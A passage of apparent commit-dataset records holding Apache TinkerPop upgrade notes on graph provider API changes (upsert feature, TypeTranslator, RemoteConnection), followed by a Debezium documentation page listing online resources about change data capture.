`TraversalEngine` is no longer in `gremlin-core` and can instead be found in `gremlin-test`, as it is\neffectively a \"test-only\" component and serves no other real function. As explained in the javadocs going back to\n3.2.0, providers should implement the `Computer` interface and use that instead. At this point, graph providers should\nhave long since moved to the `Computer` infrastructure, as methods for constructing a `TraversalSource` with a\n`TraversalEngine` were removed long ago.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143]\n\n===== Upsert Graph Feature\n\nSome `Graph` implementations may be able to offer upsert functionality for vertices and edges, which can help improve\nusability and performance. To help make it clear to users that a graph operates in this fashion, the `supportsUpsert()`\nfeature has been added to both `Graph.VertexFeatures` and `Graph.EdgeFeatures`.
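Both feature methods default to `false`. A provider opting in might override the vertex side along these lines (a sketch only; the enclosing `MyGraphFeatures` class is illustrative and the identifier semantics are provider-specific):\n\n[source,java]\n----\npublic class MyGraphFeatures implements Graph.Features {\n    @Override\n    public VertexFeatures vertex() {\n        return new VertexFeatures() {\n            @Override\n            public boolean supportsUpsert() {\n                \/\/ signals that addV() may update an existing vertex rather than insert a new one\n                return true;\n            }\n        };\n    }\n}\n----\n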
When a provider supports this feature, the behavior of `addV()` and\/or `addE()` should change such that when\na vertex or edge with the same identifier is provided, the respective step will insert the new element if that identifier\nis not present or update the existing element if it is found. The method by which the provider \"identifies\" an element\nis completely up to the capabilities of that provider. In the simplest fashion, a graph could simply check the\nvalue of the supplied `T.id`; however, graphs that support some form of schema will likely have other methods for\ndetermining whether or not an existing element is present.\n\nThe extent to which TinkerPop tests \"upsert\" is fairly narrow. Graph providers that choose to support this feature\nshould consider their own test suites carefully to ensure appropriate coverage.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1685[TINKERPOP-1685]\n\n===== TypeTranslator Changes\n\nThe `TypeTranslator` experienced a change in its API and `GroovyTranslator` a change in expectations.\n\n`TypeTranslator` now implements `BiFunction` and takes the graph traversal source name as an argument along with the\nobject to translate. This interface is implemented by default for Groovy with `GroovyTranslator.DefaultTypeTranslator`,\nwhich encapsulates all of the functionality that `GroovyTranslator` formerly provided by default. To provide customized\ntranslation, simply extend `DefaultTypeTranslator` and override the relevant methods.\n\n`GroovyTranslator` now expects that the `TypeTranslator` provided to it through its `of()` static method overload\nis \"complete\" - i.e. that it provides all the functionality to translate the types passed to it. Thus, a \"complete\"\n`TypeTranslator` is one that does everything that `DefaultTypeTranslator` does as a minimum requirement.
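A custom translator built on that extension model might be sketched as follows (the class name is illustrative, and which conversion methods to override depends on the types that need custom handling):\n\n[source,java]\n----\npublic class MyTypeTranslator extends GroovyTranslator.DefaultTypeTranslator {\n    \/\/ override the relevant conversion method(s) of DefaultTypeTranslator here to\n    \/\/ customize how particular types are rendered as Gremlin Groovy\n}\n\n\/\/ supply the \"complete\" translator through the of() overload that accepts a TypeTranslator\nGroovyTranslator translator = GroovyTranslator.of(\"g\", new MyTypeTranslator());\n----\n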
Therefore,\nthe extension model described above is the easiest way to get going with a custom `TypeTranslator` approach.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2072[TINKERPOP-2072]\n\n==== Graph Driver Providers\n\n===== Deprecation Removal in RemoteConnection\n\nThe two deprecated synchronous `submit()` methods on the `RemoteConnection` interface have been removed, which means\nthat `RemoteConnection` implementations will need to implement `submitAsync(Bytecode)` if they have not already done\nso.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89a9668ad7705776ad2448da0113216b553ccfe3","subject":"Update online-resources.asciidoc","message":"Update online-resources.asciidoc","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"documentation\/online-resources.asciidoc","new_file":"documentation\/online-resources.asciidoc","new_contents":"---\nlayout: page-menu\ntitle: Resources on the Web\npermalink: \/documentation\/online-resources\/\n---\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nA compilation of blog posts, slide sets, recordings and other online resources around Debezium.\nMost of the resources are in English; you can find a collection of link:#non_english_resources[resources in other languages] like Portuguese or French towards the end of this page.\n\nYou've written or spoken about Debezium and would like to have your post or talk listed here?\nThat's great, let us know by sharing the link in our https:\/\/groups.google.com\/forum\/#!forum\/debezium[forum].\nOr better yet, just add the link to the https:\/\/github.com\/debezium\/debezium.github.io\/blob\/develop\/docs\/online-resources.asciidoc[source of this page] yourself and send a pull request against the https:\/\/github.com\/debezium\/debezium.github.io[debezium.github.io] repo.\nThanks!\n\n== Presentations, Session Recordings and Videos\n\n* link:++https:\/\/static.sched.com\/hosted_files\/ossna2020\/c6\/Managing Data Consistency with Debezium.pdf++[\"Managing Data Consistency Among Microservices with Debezium\"] by Justin Chao\n* https:\/\/noti.st\/morsapaes\/liQzgs\/change-data-capture-with-flink-sql-and-debezium[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/www.youtube.com\/watch?v=DJTtGaPsSYY[\"Quarkus Insights #10: CDC, Debezium and the outbox pattern\"]; a live-streamed session with the Quarkus team on Debezium and the outbox pattern, including a demo\n* https:\/\/www.slideshare.net\/nfrankel\/london-inmemory-computing-meetup-a-changedatacapture-usecase-designing-an-evergreen-cache[\"A Change-Data-Capture use-case: designing an evergreen cache\"] by Nicolas Fr\u00e4nkel\n* https:\/\/www.youtube.com\/watch?v=6nU9i022yeY[\"Microservices & Data: Implementing the Outbox Pattern with Debezium\"] by Thorben Janssen\n* \"Practical Change Data Streaming Use Cases With Apache Kafka and Debezium\" (https:\/\/www.infoq.com\/presentations\/data-streaming-kafka-debezium\/[recording], https:\/\/speakerdeck.com\/gunnarmorling\/practical-change-data-streaming-use-cases-with-apache-kafka-and-debezium-qcon-san-francisco-2019[slides]) by Gunnar Morling; QCon San Francisco 2019; JokerConf St. 
Petersburg 2019\n* https:\/\/speakerdeck.com\/jbfletch\/using-kafka-to-discover-events-hidden-in-your-database[\"Using Kafka to Discover Events Hidden in your Database\"] by Anna McDonald; Kafka Summit San Francisco 2019\n* https:\/\/databricks.com\/session_eu19\/modern-etl-pipelines-with-change-data-capture[\"Modern ETL Pipelines with Change Data Capture\"] by Thiago Rigo and David Mariassy; Spark and AI Summit Europe 2019\n* https:\/\/www.infoq.com\/news\/2019\/04\/change-data-capture-debezium\/[\"Creating Events from Databases Using Change Data Capture: Gunnar Morling at MicroXchg Berlin\"] by Jan Stenberg; a session report from MicroXchg\n* https:\/\/developers.redhat.com\/videos\/youtube\/QYbXDp4Vu-8\/[\"Change Data Streaming Patterns for Microservices With Debezium\"] by Gunnar Morling; 30 min webinar with live demo, February 2019\n* https:\/\/www.slideshare.net\/MikeFowler28\/migrating-with-debezium[\"Migrating with Debezium\"] by Mike Fowler; London PostgreSQL Meetup, January 2019\n* \"The Why's and How's of Database Streaming\" by Joy Gao (https:\/\/www.infoq.com\/presentations\/wepay-database-streaming[recording], https:\/\/qconsf.com\/system\/files\/presentation-slides\/whys_and_hows_of_database_streaming_final.pdf[slides]), QCon San Francisco, 2018\n* \"Change Data Streaming Patterns for Microservices With Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=NawsloOoFo0[video recording], https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[slides]), Voxxed Microservices Paris 2018; https:\/\/www.confluent.io\/kafka-summit-sf18\/change-data-streaming-patterns-for-microservices-with-debezium[recording and slides] from Kafka Summit San Francisco 2018\n* https:\/\/speakerdeck.com\/rk3rn3r\/i-need-my-data-and-a-little-bit-of-your-data-dot-integrating-services-with-apache-kafka-confluent-streaming-event-munich[\"I need my data and a little bit of your data.\" - Integrating services with Apache Kafka] by https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Confluent Streaming Event Munich 2018\n* https:\/\/aiven.io\/assets\/img\/blog\/zalando-kafka-cdc-presentation.pdf[\"PG Change Data Capture with Debezium\"] by Hannu Valtonen; Kafka Meetup Helsinki 2018\n* https:\/\/de.slideshare.net\/FrankLyaruu\/embracing-database-diversity-with-kafka-and-debezium[\"Embracing Database Diversity with Kafka and Debezium\"] by Frank Lyaruu; VoxxedDays Vienna 2018\n* https:\/\/speakerdeck.com\/japoneizo\/syncing-data-between-microservices-using-debezium-and-apache-kafka[\"Syncing data between microservices using Debezium and Apache Kafka\"] by Eizo Nishime; The Developer's Conference S\u00e3o Paulo 2018\n* https:\/\/www.slideshare.net\/kgwap\/kafka-connect-debezium?ref=http:\/\/kasundon.com\/2018\/07\/08\/streaming-mysql-change-sets-to-kafka-aws-kinesis\/[\"Kafka Connect - Debezium; Stream MySQL Events to Kafka\"] by Kasun Don; 2018\n* \"Streaming Database Changes with Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=IOZ2Um6e430[Video recording] from Devoxx 2017; https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[Slides] from RivieraDev 2018)\n* https:\/\/speakerdeck.com\/xenji\/kafka-and-debezium-at-trivago-code-dot-talks-2017-edition\"[\"Kafka and Debezium at trivago\"] by https:\/\/twitter.com\/xenji\/[Mario M\u00fcller] and https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Code.Talks 2017\n* https:\/\/vimeo.com\/168409093[\"Event Sourcing with Debezium and Kafka\"] by Christian Posta; 
2016\n\n== Blog Posts & Articles\n\n* https:\/\/medium.com\/incognia-tech\/ensuring-data-consistency-across-services-with-the-transactional-outbox-pattern-90be4d735cb0[\"Ensuring data consistency across services with the Transactional Outbox pattern\"] by Mateus Moury and Rafael Acevedo\n* https:\/\/medium.com\/event-driven-utopia\/a-gentle-introduction-to-event-driven-change-data-capture-683297625f9b[\"A Gentle Introduction to Event-driven Change Data Capture\"] by Dunith Dhanushka\n* https:\/\/maciejszymczyk.medium.com\/change-data-capture-convert-your-database-into-a-stream-with-debezium-356c1a49b459[\"Change Data Capture \u2014 Convert your database into a stream with Debezium\"] by Maciej Szymczyk\n* https:\/\/info.crunchydata.com\/blog\/postgres-change-data-capture-with-debezium[\"Change Data Capture in Postgres With Debezium\"] by Dave Cramer\n* https:\/\/medium.com\/apache-pinot-developer-blog\/change-data-analysis-with-debezium-and-apache-pinot-b4093dc178a7[\"Change Data Analysis with Debezium and Apache Pinot\"] by Kenny Bastani\n* https:\/\/juliuskrah.com\/blog\/2020\/01\/06\/streaming-changes-from-keycloak-using-debezium-cdc\/[\"Streaming Changes from Keycloak using Debezium (CDC)\"] by Julius Krah\n* https:\/\/www.tigeranalytics.com\/blog\/building-nrt-data-pipeline-debezium-kafka-snowflake\/[\"Building a Near-Real Time (NRT) Data Pipeline using Debezium, Kafka, and Snowflake\"] by Arun Kumar Ponnurangam and Karunakar Goud\n* https:\/\/medium.com\/data-rocks\/creating-a-no-code-aws-native-oltp-to-olap-data-pipeline-part-1-50481b57dc30[\"Creating a no-code AWS native OLTP to OLAP data pipeline \u2014 Part 1\"] by Haris Michailidis\n* https:\/\/www.zuehlke.com\/en\/insights\/design-failure-distributed-transactions-microservices[\"Design for Failure \u2014 Distributed Transactions in Microservices\"] by Darren Boo\n* https:\/\/blog.rafaelgss.com.br\/autonomous-microservices[\"Autonomous Microservices - Outbox Pattern\"] by Rafael Gonzaga\n* https:\/\/medium.com\/trendyol-tech\/debezium-with-simple-message-transformation-smt-4f5a80c85358[\"Debezium with Simple Message Transformation (SMT)\"] by Okan Yildirim\n* https:\/\/www.systemcraftsman.com\/2020\/11\/30\/asap-the-storified-demo-of-introduction-to-debezium-and-kafka-on-kubernetes\/[\"ASAP! 
\u2013 The Storified Demo of Introduction to Debezium and Kafka on Kubernetes\"] by Aykut Bulgu\n* https:\/\/elephanttamer.net\/?p=50[\"Setting up PostgreSQL for Debezium\"] by Micha\u0142 Mackiewicz\n* https:\/\/medium.com\/@midhunsukumaran.mec\/a-year-and-a-half-with-debezium-f4f323b4909d[\"A year and a half with Debezium: CDC With MySQL\"] by Midhun Sukumaran\n* https:\/\/jet-start.sh\/blog\/2020\/10\/06\/enabling-full-text-search[\"Enabling Full-text Search with Change Data Capture in a Legacy Application\"] by Franti\u0161ek Hartman\n* https:\/\/medium.com\/@sumant.rana\/sync-mysql-to-postgresql-using-debezium-and-kafkaconnect-d6612489fd64[\"Sync MySQL to PostgreSQL using Debezium and Kafka Connect\"] by Sumant Rana\n* https:\/\/turkogluc.com\/postgresql-capture-data-change-with-debezium\/[\"Making Sense of Change Data Capture Pipelines for Postgres with Debezium Kafka Connector\"] by Cemal Turkoglu\n* https:\/\/developers.redhat.com\/cheat-sheets\/debezium-openshift-cheat-sheet[\"Debezium on OpenShift Cheat Sheet\"] by Abdellatif Bouchama\n* https:\/\/medium.com\/data-rocks\/managing-kafka-connectors-at-scale-using-kafka-connect-manager-kcm-31d887de033c[\"Managing Kafka Connectors at scale using Kafka Connect Manager\"] by Sandeep Mehta\n* https:\/\/medium.com\/dana-engineering\/streaming-data-changes-in-mysql-into-elasticsearch-using-debezium-kafka-and-confluent-jdbc-sink-8890ad221ccf[\"How to stream data changes from MySQL into Elasticsearch using Debezium\"] by Rizqi Nugroho\n* https:\/\/medium.com\/@changeant\/implementing-the-transactional-outbox-pattern-with-debezium-in-quarkus-f2680306951[\"Implementing the Transactional Outbox pattern with Debezium in Quarkus\"] by Iain Porter\n* https:\/\/www.confluent.io\/blog\/cdc-and-streaming-analytics-using-debezium-kafka\/[\"Analysing Changes with Debezium and Kafka Streams\"] by Mike Fowler\n* https:\/\/medium.com\/@bogdan.dina03\/de-coupling-yourself-507a15fa100d[\"(De)coupling yourself\"] by Dina Bogdan\n* https:\/\/medium.com\/comsystoreply\/stream-your-database-into-kafka-with-debezium-a94b2f649664[\"Stream Your Database into Kafka with Debezium -- An Introduction and Experience Report\"] by David Hettler\n* https:\/\/medium.com\/@limadelrey\/kafka-connect-how-to-create-a-real-time-data-pipeline-using-change-data-capture-cdc-c60e06e5306a[\"Kafka Connect: How to create a real time data pipeline using Change Data Capture (CDC)\"] by Francisco Lima\n* https:\/\/dev.to\/abhirockzz\/tutorial-set-up-a-change-data-capture-architecture-on-azure-using-debezium-postgres-and-kafka-49h6[\"Tutorial: Set up a Change Data Capture architecture on Azure using Debezium, Postgres and Kafka \"] by Abhishek Gupta\n* Kafka Connect \u2013 Offset commit errors by Javier Holguera: https:\/\/www.javierholguera.com\/2020\/06\/02\/kafka-connect-offset-commit-errors-i\/[Part 1], https:\/\/www.javierholguera.com\/2020\/06\/16\/kafka-connect-offset-commit-errors-ii\/[Part 2]\n* https:\/\/medium.com\/@samuel_vdc\/data-liberation-pattern-using-debezium-engine-4fd32b92d826[\"Data liberation pattern using the Debezium engine\"] by Samuel Vandecasteele\n* https:\/\/medium.com\/hepsiburadatech\/postgresql-db-change-data-capture-cdc-using-debezium-f1a933174fd8[\"PostgreSql Db Change Data Capture (CDC) Using Debezium\"] by Caner Tosuner\n* http:\/\/www.mastertheboss.com\/jboss-frameworks\/debezium\/getting-started-with-debezium[\"Getting started with Debezium\"] by Francesco Marchioni\n* 
https:\/\/dev.to\/oryanmoshe\/debezium-custom-converters-timestampconverter-26hh[\"Debezium Custom Converters - TimestampConverter\"] by Oryan Moshe\n* https:\/\/www.gridgain.com\/resources\/blog\/change-data-capture-between-mysql-and-gridgain-debezium[\"Change Data Capture Between MySQL and GridGain With Debezium\"] by Evgenii Zhuravlev\n* https:\/\/cloud.google.com\/blog\/products\/data-analytics\/how-to-move-data-from-mysql-to-bigquery[\"How do I move data from MySQL to BigQuery?\"], discussing usage of the Debezium embedded engine with Google Cloud Dataflow, by Pablo Estrada and Griselda Cuevas\n* https:\/\/medium.com\/everything-full-stack\/streaming-data-changes-to-a-data-lake-with-debezium-and-delta-lake-pipeline-299821053dc3[\"Streaming data changes to a Data Lake with Debezium and Delta Lake pipeline\"] by Yinon D. Nahamu\n* https:\/\/www.infoq.com\/news\/2020\/01\/cdc-debezium-1-0-final-released\/[\"Change Data Capture Tool Debezium 1.0 Final Released\"] by Jan Stenberg\n* https:\/\/strimzi.io\/2020\/01\/27\/deploying-debezium-with-kafkaconnector-resource.html[\"Deploying Debezium using the new KafkaConnector resource\"] by Tom Bentley\n* https:\/\/www.sderosiaux.com\/articles\/2020\/01\/06\/learnings-from-using-kafka-connect-debezium-postgresql\/[\"Learnings from using Kafka Connect - Debezium - PostgreSQL\"] by St\u00e9phane Derosiaux\n* https:\/\/thedataguy.in\/monitor-debezium-mysql-connector-with-prometheus-and-grafana\/[\"Monitor Debezium MySQL Connector With Prometheus And Grafana\"] by Bhuvanesh\n* http:\/\/www.carbonrider.com\/2019\/11\/16\/change-data-capture-with-apache-kafka-postgresql-kafka-connect-and-debezium\/[\"Change Data Capture with Apache Kafka, PostgreSQL, Kafka Connect and Debezium\"] by Yogesh Jadhav\n* https:\/\/dzone.com\/articles\/implementing-the-outbox-pattern[\"Implementing the Outbox Pattern\"] by Sohan Ganapathy\n* https:\/\/medium.com\/engineering-varo\/event-driven-architecture-and-the-outbox-pattern-569e6fba7216[\"Event-Driven Architecture and the Outbox Pattern\"] by Rod Shokrian\n* https:\/\/medium.com\/convoy-tech\/logs-offsets-near-real-time-elt-with-apache-kafka-snowflake-473da1e4d776[\"Logs & Offsets: (Near) Real Time ELT with Apache Kafka + Snowflake\"] by Adrian Kreuziger\n* https:\/\/info.crunchydata.com\/blog\/postgresql-change-data-capture-with-debezium[\"PostgreSQL Change Data Capture With Debezium\"] by Dave Cramer\n* https:\/\/developers.redhat.com\/blog\/2019\/09\/03\/cdc-pipeline-with-red-hat-amq-streams-and-red-hat-fuse\/[\"CDC pipeline with Red Hat AMQ Streams and Red Hat Fuse\"] by Sadhana Nandakumar\n* https:\/\/medium.com\/@hpgrahsl\/communicating-data-changes-across-service-boundaries-safely-129c4eb5db8[\"Communicating Data Changes Across Service Boundaries\u2026 Safely!\"] by Hans-Peter Grahsl\n* https:\/\/blog.clairvoyantsoft.com\/mysql-cdc-with-apache-kafka-and-debezium-3d45c00762e4[\"MySQL CDC with Apache Kafka and Debezium\"] by Kushal Yellam\n* https:\/\/thoughts-on-java.org\/outbox-pattern-with-cdc-and-debezium\/[\"Implementing the Outbox Pattern with CDC using Debezium\"] by Thorben Janssen\n* https:\/\/blog.zhaw.ch\/splab\/2019\/05\/03\/serverless-plumbing-streaming-mysql-events-to-knative-services\/[\"Serverless Plumbing: Streaming MySQL Events to Knative Services\"] by Mohammed Al-Ameen\n* https:\/\/medium.com\/yotpoengineering\/building-zero-latency-data-lake-using-change-data-capture-f93ef50eb066[\"Building zero-latency data lake using Change Data Capture\"] by Ofir Ventura\n* 
https:\/\/medium.com\/high-alpha\/data-stream-processing-for-newbies-with-kafka-ksql-and-postgres-c30309cfaaf8[\"Data Stream Processing for Newbies with Kafka, KSQL, and Postgres\"] by Maria Patterson\n* https:\/\/blog.couchbase.com\/kafka-connect-mysql-couchbase-debezium\/[\"Kafka Connect from MySQL to Couchbase with Debezium\"] by Matthew Groves\n* https:\/\/www.linkedin.com\/pulse\/change-data-capture-postgresql-via-debezium-part-1-paolo-scarpino\/[\"Change Data Capture on PostgreSQL via Debezium\"] by Paolo Scarpino\n* https:\/\/medium.com\/jw-player-engineering\/southpaw-176aea5f4583[\"Southpaw - Streaming Left Joins with Change Data Capture\"] by Morrigan Jones\n* https:\/\/medium.com\/@hpgrahsl\/connecting-apache-kafka-to-azure-cosmosdb-part-ii-b96cf0f5cdfa[\"Connecting Apache Kafka to Azure CosmosDB\u200a\u2014\u200aPart II\"] by Hans-Peter Grahsl\n* https:\/\/vladmihalcea.com\/how-to-extract-change-data-events-from-mysql-to-kafka-using-debezium\/[\"How to extract change data events from MySQL to Kafka using Debezium\"] by Vlad Mihalcea\n* https:\/\/rmoff.net\/2019\/10\/16\/using-kafka-connect-and-debezium-with-confluent-cloud\/[\"Using Kafka Connect and Debezium with Confluent Cloud\"]\n* https:\/\/rmoff.net\/2019\/11\/20\/streaming-data-from-sql-server-to-kafka-to-snowflake-with-kafka-connect\/[\"Streaming data from SQL Server to Kafka to Snowflake \u2744\ufe0f with Kafka Connect and Debezium\"]\n* https:\/\/rmoff.net\/2018\/03\/24\/streaming-data-from-mysql-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MySQL into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/rmoff.net\/2018\/03\/27\/streaming-data-from-mongodb-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MongoDB into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/medium.com\/@tilakpatidar\/streaming-data-from-postgresql-to-kafka-using-debezium-a14a2644906d[\"Streaming data from PostgreSQL to Kafka using Debezium\"] by Tilak Patidar\n* https:\/\/medium.com\/blablacar-tech\/streaming-data-out-of-the-monolith-building-a-highly-reliable-cdc-stack-d71599131acb[\"Streaming Data out of the Monolith: Building a Highly Reliable CDC Stack\"] by Yuancheng Peng\n* https:\/\/iamninad.com\/how-debezium-kafka-stream-can-help-you-write-cdc\/[\"How Debezium & Kafka Streams Can Help You Write CDC Solution\"] by Neenad Ingole\n* https:\/\/jakubbujny.com\/2018\/09\/20\/replicate-cloud-aws-rds-mysql-to-on-premise-postgresql-in-docker-future-is-today-debezium-and-kafka-on-aws-eks\/[Replicate cloud AWS RDS MySQL to on-premise PostgreSQL in Docker \u2013 future is today! 
Debezium and Kafka on AWS EKS] by Jakub Bujny\n* https:\/\/medium.com\/@mauridb\/sql-server-change-stream-b204c0892641[\"SQL Server Change Stream - Responding to data changes in real time using modern technologies\"]\n* https:\/\/medium.com\/@hpgrahsl\/optimizing-read-access-to-sharded-mongodb-collections-utilizing-apache-kafka-connect-cdcd8ec6228[\"Optimizing Read Access to Sharded MongoDB Collections utilizing Apache Kafka Connect\"] by Hans-Peter Grahsl\n\n== Example Code\n\n* https:\/\/github.com\/debezium\/debezium-examples\/[Debezium's official examples]\n* https:\/\/ibm-cloud-architecture.github.io\/refarch-eda\/use-cases\/db2-debezium\/[DB2 Change Data Capture with Debezium]\n* https:\/\/github.com\/yorek\/debezium-sql-change-stream[\"SQL Server Change Stream sample using Debezium\"] by Davide Mauri\n* https:\/\/github.com\/foogaro\/change-data-capture[\"CDC project based on Debezium, Kafka, MS SQL Server, Infinispan and Teiid, entirely based on containers\"] by Luigi Fugaro\n* https:\/\/github.com\/fvaleri\/cdc[\"CDC with Camel and Debezium: code-driven vs configuration-driven pipelines\"] by Federico Valeri\n* https:\/\/github.com\/morsapaes\/flink-sql-CDC[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/github.com\/suadev\/microservices-change-data-capture-with-debezium[\"Microservices Change Data Capture With Debezium\"] by Suat K\u00f6se\n\n== Interviews and Podcasts\n\n* https:\/\/www.dataengineeringpodcast.com\/debezium-change-data-capture-episode-114\/[Change Data Capture For All Of Your Databases With Debezium -- episode #114 of the Data Engineering Podcast by Tobias Macey, together with Randall Hauch]\n* https:\/\/www.buzzsprout.com\/186154\/1770184[MySQL, Cassandra, BigQuery, and Streaming Analytics with Joy Gao]\n* http:\/\/airhacks.fm\/#episode_57[CDC, Debezium, streaming and Apache Kafka -- episode #57 of Adam Bien's airhacks.fm podcast]\n* https:\/\/www.buzzsprout.com\/186154\/1365043-change-data-capture-with-debezium-ft-gunnar-morling[Change Data Capture with Debezium ft. 
Gunnar Morling]\n* https:\/\/www.youtube.com\/watch?v=H-yGdKy48VE[Interview with Gunnar Morling] for thoughts-on-java.org\n\n== Other\n\n* https:\/\/www.thoughtworks.com\/radar\/platforms\/debezium[Debezium entry in the ThoughtWorks Technology Radar]\n* https:\/\/learn.openshift.com\/middleware\/debezium-getting-started\/[Getting Started with Debezium on OpenShift]; interactive Debezium learning scenario allowing you to try out Debezium on OpenShift within minutes\n\n== Non-English Resources\n\n* \ud83c\udde9\ud83c\uddea https:\/\/blogs.zeiss.com\/digital-innovation\/de\/datenbankaenderungen-teil-1\/[Datenbank\u00e4nderungen erkennen und streamen mit Debezium und Apache Kafka (Teil 1) \u2013 Die Theorie] (blog post, German)\n* \ud83c\uddf5\ud83c\uddf1 https:\/\/wiadrodanych.pl\/big-data\/change-data-capture-mysql-debezium\/[Change Data Capture \u2013 Zmie\u0144 Baz\u0119 W Strumie\u0144 (Debezium)] by Maciej Szymczyk (blog post, Polish)\n* \ud83c\uddf7\ud83c\uddfa https:\/\/habr.com\/ru\/company\/flant\/blog\/523510\/[\u0417\u043d\u0430\u043a\u043e\u043c\u0441\u0442\u0432\u043e \u0441 Debezium \u2014 CDC \u0434\u043b\u044f Apache Kafka] (blog post, Russian)\n* \ud83c\udde8\ud83c\uddf3 https:\/\/mp.weixin.qq.com\/s\/Mfn-fFegb5wzI8BIHhNGvQ[\"Flink SQL CDC \u4e0a\u7ebf\uff01\u6211\u4eec\u603b\u7ed3\u4e86 13 \u6761\u751f\u4ea7\u5b9e\u8df5\u7ecf\u9a8c\"] by Zeng Qingdong (blog post, Mandarin)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/medium.com\/@viavarejo.productdevelopment\/uma-estrat%C3%A9gia-de-cdc-com-debezium-e27aa945d7b0[\"Uma estrat\u00e9gia de CDC com Debezium\"] by Jo\u00e3o Gabriel Mello, Brunno Lira and Marcelo Costa (blog post, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/www.infoq.com\/br\/presentations\/postgresql-ao-datalake-utilizando-kafkadebezium\/[Do PostgreSQL ao Data Lake utilizando Kafka-Debezium] by Paulo Singaretti, PGConf S\u00e3o Paulo 2019 (conference session recording, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/www.youtube.com\/watch?v=jtVD-HIJG9M&feature=youtu.be[Quarkus #25: Monitoramento de qualquer opera\u00e7\u00e3o em uma tabela do banco de dados com Debezium] by Vinicius Ferraz (screen cast, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/elo7.dev\/cdc-parte-1\/[\"Introdu\u00e7\u00e3o ao Change Data Capture (CDC)\"] by Renato Sardinha (blog post, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/medium.com\/@singaretti\/streaming-de-dados-do-postgresql-utilizando-kafka-debezium-v2-d49f46d70b37[\"Streaming de dados (do PostgreSQL) utilizando Kafka|Debezium (v2)\"] by Paulo Singaretti (blog post, Portuguese)\n* \ud83c\uddeb\ud83c\uddf7 https:\/\/www.synaltic.fr\/blog\/conference-poss-11-12-2019\/[Conf\u00e9rence POSS 2019 : Streaming Processing avec Debezium] by Yabir Canario De la Mota & Charly Clairmont (blog post, French)\n* \ud83c\udde9\ud83c\uddea https:\/\/www.heise.de\/developer\/artikel\/Im-Gespraech-Gunnar-Morling-ueber-Debezium-und-CDC-4513865.html[Im Gespr\u00e4ch: Gunnar Morling \u00fcber Debezium und CDC]; interview with Thorben Janssen for heise.de (podcast, German)\n* \ud83c\uddee\ud83c\udde9 https:\/\/medium.com\/easyread\/ingest-data-dari-mysql-database-ke-bigquery-dengan-apache-kafka-dan-debezium-f519e197f39c[\"Ingesting Data dari MySQL Database ke BigQuery dengan Apache Kafka dan Debezium\"] by Ilyas Ahsan (blog post, Indonesian)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/19\/debezium-camel-integration\/[Debezium\u3068Apache 
Camel\u306e\u30a4\u30f3\u30c6\u30b0\u30ec\u30fc\u30b7\u30e7\u30f3\u30b7\u30ca\u30ea\u30aa] (Japanese translation of the blog post link:\/blog\/2020\/02\/19\/debezium-camel-integration\/[Integration Scenarios with Debezium and Apache Camel] by Jiri Pechanec)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/10\/event-sourcing-vs-cdc\/[\u30de\u30a4\u30af\u30ed\u30b5\u30fc\u30d3\u30b9\u306e\u305f\u3081\u306e\u5206\u6563\u30c7\u30fc\u30bf \u301c \u30a4\u30d9\u30f3\u30c8\u30bd\u30fc\u30b7\u30f3\u30b0 vs \u30c1\u30a7\u30f3\u30b8\u30c7\u30fc\u30bf\u30ad\u30e3\u30d7\u30c1\u30e3] (Japanese translation of the blog post link:\/blog\/2020\/02\/10\/event-sourcing-vs-cdc\/[Distributed Data for Microservices \u2014 Event Sourcing vs. Change Data Capture] by Eric Murphy)\n","old_contents":"---\nlayout: page-menu\ntitle: Resources on the Web\npermalink: \/documentation\/online-resources\/\n---\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nA compilation of blog posts, slide sets, recordings and other online resources around Debezium.\nMost of the resources are in English; you can find a collection of link:#non_english_resources[resources in other languages] like Portuguese or French towards the end of this page.\n\nYou've written or spoken about Debezium and would like to have your post or talk listed here?\nThat's great, let us know by sharing the link in our https:\/\/groups.google.com\/forum\/#!forum\/debezium[forum].\nOr better yet, just add the link to the https:\/\/github.com\/debezium\/debezium.github.io\/blob\/develop\/docs\/online-resources.asciidoc[source of this page] yourself and send a pull request against the https:\/\/github.com\/debezium\/debezium.github.io[debezium.github.io] repo.\nThanks!\n\n== Presentations, Session Recordings and Videos\n\n* link:++https:\/\/static.sched.com\/hosted_files\/ossna2020\/c6\/Managing Data Consistency with Debezium.pdf++[\"Managing Data Consistency Among Microservices with Debezium\"] by Justin Chao\n* https:\/\/noti.st\/morsapaes\/liQzgs\/change-data-capture-with-flink-sql-and-debezium[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/www.youtube.com\/watch?v=DJTtGaPsSYY[\"Quarkus Insights #10: CDC, Debezium and the outbox pattern\"]; a live-streamed session with the Quarkus team on Debezium and the outbox pattern, including a demo\n* 